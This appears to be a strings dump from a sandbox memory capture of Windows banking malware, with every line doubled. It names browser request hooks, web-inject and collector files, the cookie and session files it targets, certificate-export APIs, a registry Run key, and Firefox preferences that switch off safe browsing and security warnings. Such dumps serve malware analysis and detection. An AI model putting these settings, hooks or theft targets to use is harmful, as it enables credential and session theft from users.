HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
%System%\WS2_32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
svchost.exe_904_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
c:\windows\system32\WS2_32.dll
c:\windows\system32\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
svchost.exe_988_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
